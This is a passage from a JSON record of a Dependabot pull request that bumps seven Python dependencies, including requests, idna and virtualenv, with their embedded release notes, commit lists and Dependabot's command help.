(2024-09-17)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.5\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade embedded wheels: setuptools to \u003ccode\u003e75.1.0\u003c/code\u003e from \u003ccode\u003e74.1.2\u003c/code\u003e - by :user:\u003ccode\u003egaborbernat\u003c/code\u003e. (:issue:\u003ccode\u003e2765\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.4 (2024-09-07)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.4\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- no longer create `()` output in console during activation of a virtualenv by .bat file. (:issue:`2728`)\n- Upgrade embedded wheels:\n\u003cul\u003e\n\u003cli\u003ewheel to \u003ccode\u003e0.44.0\u003c/code\u003e from \u003ccode\u003e0.43.0\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.2\u003c/code\u003e from \u003ccode\u003e24.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e74.1.2\u003c/code\u003e from \u003ccode\u003e70.1.0\u003c/code\u003e (:issue:\u003ccode\u003e2760\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.3 (2024-06-21)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.3\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade embedded wheels:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003esetuptools to \u003ccode\u003e70.1.0\u003c/code\u003e from \u003ccode\u003e69.5.1\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003epip to \u003ccode\u003e24.1\u003c/code\u003e from \u003ccode\u003e24.0\u003c/code\u003e (:issue:\u003ccode\u003e2741\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev20.26.2 (2024-05-13)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.2\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e- ``virtualenv.pyz`` no longer fails when zipapp path contains a symlink - by :user:`HandSonic` and :user:`petamas`. (:issue:`1949`)\n- Fix bad return code from activate.sh if hashing is disabled - by :user:'fenkes-ibm'. (:issue:`2717`)\n\u003ch2\u003ev20.26.1 (2024-04-29)\u003c/h2\u003e\n\u003cp\u003eBugfixes - 20.26.1\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ec04726d065372ffad9920998aef1ce41252a61d\"\u003e\u003ccode\u003eec04726\u003c/code\u003e\u003c/a\u003e release 20.26.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/86dddeda7c991f8529e1995bbff280fb7b761972\"\u003e\u003ccode\u003e86ddded\u003c/code\u003e\u003c/a\u003e Fix \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2768\"\u003e#2768\u003c/a\u003e: Quote template strings in activation scripts (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2771\"\u003e#2771\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/6bb3f6226c18d69bb6cfa3475b6d46dd463bb530\"\u003e\u003ccode\u003e6bb3f62\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2769\"\u003e#2769\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/220d49c2e3ade2ed24f5712ab5a23895cde2e04c\"\u003e\u003ccode\u003e220d49c\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.10.1 to 1.10.2 (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2767\"\u003e#2767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/cf340c83c2828a92def78c77b3e037a2baa4d557\"\u003e\u003ccode\u003ecf340c8\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2766\"\u003e#2766\u003c/a\u003e from pypa/release-20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/f3172b4da576b88275a14d2e7bbeb98b8f958a05\"\u003e\u003ccode\u003ef3172b4\u003c/code\u003e\u003c/a\u003e release 20.26.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/22b9795eb6bed0c17d0415c5513eca099a0a11ad\"\u003e\u003ccode\u003e22b9795\u003c/code\u003e\u003c/a\u003e Use uv over pip (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2765\"\u003e#2765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/35d8269aba12a1e3c60183a2082b2c4d0cc1192f\"\u003e\u003ccode\u003e35d8269\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2764\"\u003e#2764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/ee77feb77ccb3c5deefa318630c59315bcfda521\"\u003e\u003ccode\u003eee77feb\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/pypa/virtualenv/issues/2763\"\u003e#2763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pypa/virtualenv/commit/c5160566293ed098ca30e0856dbf44588dd5c3a3\"\u003e\u003ccode\u003ec516056\u003c/code\u003e\u003c/a\u003e Update README.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pypa/virtualenv/compare/20.4.2...20.26.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/sumonst21/flask/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/sumonst21/flask/pull/3","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/sumonst21%2Fflask/issues/3","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/3/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-10T00:21:33.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2579757329","node_id":"PR_kwDOFX7Eos6Zw_kR","number":3,"state":"open","title":"Bump the pip group across 1 directory with 7 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T00:21:33.000Z","updated_at":"2025-06-10T00:21:33.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":7,"packages":[{"name":"certifi","old_version":"2020.11.8","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"2.10","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.25.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.4","new_version":"1.26.19","repository_url":"https://github.com/urllib3/urllib3"},{"name":"virtualenv","old_version":"20.2.1","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"},{"name":"zipp","old_version":"3.4.0","new_version":"3.19.1","repository_url":"https://github.com/jaraco/zipp"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.11.8` | `2024.7.4` |\n| [idna](https://github.com/kjd/idna) | `2.10` | `3.7` |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.25.0` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.26.4` | `1.26.19` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `20.2.1` | `20.26.6` |\n| [zipp](https://github.com/jaraco/zipp) | `3.4.0` | `3.19.1` |\n\n\nUpdates `certifi` from 2020.11.8 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.11.08...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 2.10 to 3.7\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/releases\"\u003eidna's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could take exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/kjd/idna/compare/v3.6...v3.7\"\u003ehttps://github.com/kjd/idna/compare/v3.6...v3.7\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.rst\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e3.7 (2024-04-11)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue where specially crafted inputs to encode() could\ntake exceptionally long amount of time to process. [CVE-2024-3651]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Guido Vranken for reporting the issue.\u003c/p\u003e\n\u003cp\u003e3.6 (2023-11-25)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix regression to include tests in source distribution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e3.5 (2023-11-24)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.1.0\u003c/li\u003e\n\u003cli\u003eString codec name is now \u0026quot;idna2008\u0026quot; as overriding the system codec\n\u0026quot;idna\u0026quot; was not working.\u003c/li\u003e\n\u003cli\u003eFix typing error for codec encoding\u003c/li\u003e\n\u003cli\u003e\u0026quot;setup.cfg\u0026quot; has been added for this release due to some downstream\nlack of adherence to PEP 517. Should be removed in a future release\nso please prepare accordingly.\u003c/li\u003e\n\u003cli\u003eRemoved reliance on a symlink for the \u0026quot;idna-data\u0026quot; tool to comport\nwith PEP 517 and the Python Packaging User Guide for sdist archives.\u003c/li\u003e\n\u003cli\u003eAdded security reporting protocol for project\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks Jon Ribbens, Diogo Teles Sant'Anna, Wu Tingfeng for contributions\nto this release.\u003c/p\u003e\n\u003cp\u003e3.4 (2022-09-14)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 15.0.0\u003c/li\u003e\n\u003cli\u003eMigrate to pyproject.toml for build information (PEP 621)\u003c/li\u003e\n\u003cli\u003eCorrect another instance where generic exception was raised instead of\nIDNAError for malformed input\u003c/li\u003e\n\u003cli\u003eSource distribution uses zeroized file ownership for improved\nreproducibility\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Seth Michael Larson for contributions to this release.\u003c/p\u003e\n\u003cp\u003e3.3 (2021-10-13)\n++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate to Unicode 14.0.0\u003c/li\u003e\n\u003cli\u003eUpdate to in-line type annotations\u003c/li\u003e\n\u003cli\u003eThrow IDNAError exception correctly for some malformed input\u003c/li\u003e\n\u003cli\u003eAdvertise support for Python 3.10\u003c/li\u003e\n\u003cli\u003eImprove testing regime on Github\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1d365e17e10d72d0b7876316fc7b9ca0eebdd38d\"\u003e\u003ccode\u003e1d365e1\u003c/code\u003e\u003c/a\u003e Release v3.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c1b3154939907fab67c5754346afaebe165ce8e6\"\u003e\u003ccode\u003ec1b3154\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/172\"\u003e#172\u003c/a\u003e from kjd/optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0394ec76ff022813e770ba1fd89658790ea35623\"\u003e\u003ccode\u003e0394ec7\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into optimize-contextj\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/cd58a23173d2b0a40b95ee680baf3e59e8d33966\"\u003e\u003ccode\u003ecd58a23\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/152\"\u003e#152\u003c/a\u003e from elliotwutingfeng/dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5beb28b9dd77912c0dd656d8b0fdba3eb80222e7\"\u003e\u003ccode\u003e5beb28b\u003c/code\u003e\u003c/a\u003e More efficient resolution of joiner contexts\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1b121483ed04d9576a1291758f537e1318cddc8b\"\u003e\u003ccode\u003e1b12148\u003c/code\u003e\u003c/a\u003e Update ossf/scorecard-action to v2.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d516b874c3388047934938a500c7488d52c4e067\"\u003e\u003ccode\u003ed516b87\u003c/code\u003e\u003c/a\u003e Update Github actions/checkout to v4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c095c75943413c75ebf8ac74179757031b7f80b7\"\u003e\u003ccode\u003ec095c75\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/60a0a4cb61ec6834d74306bd8a1fa46daac94c98\"\u003e\u003ccode\u003e60a0a4c\u003c/code\u003e\u003c/a\u003e Fix typo in GitHub Actions workflow key\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5918a0ef8034379c2e409ae93ee11d24295bb201\"\u003e\u003ccode\u003e5918a0e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into dev\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v2.10...v3.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.25.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.0\u003c/h2\u003e\n\u003cp\u003e2.32.0 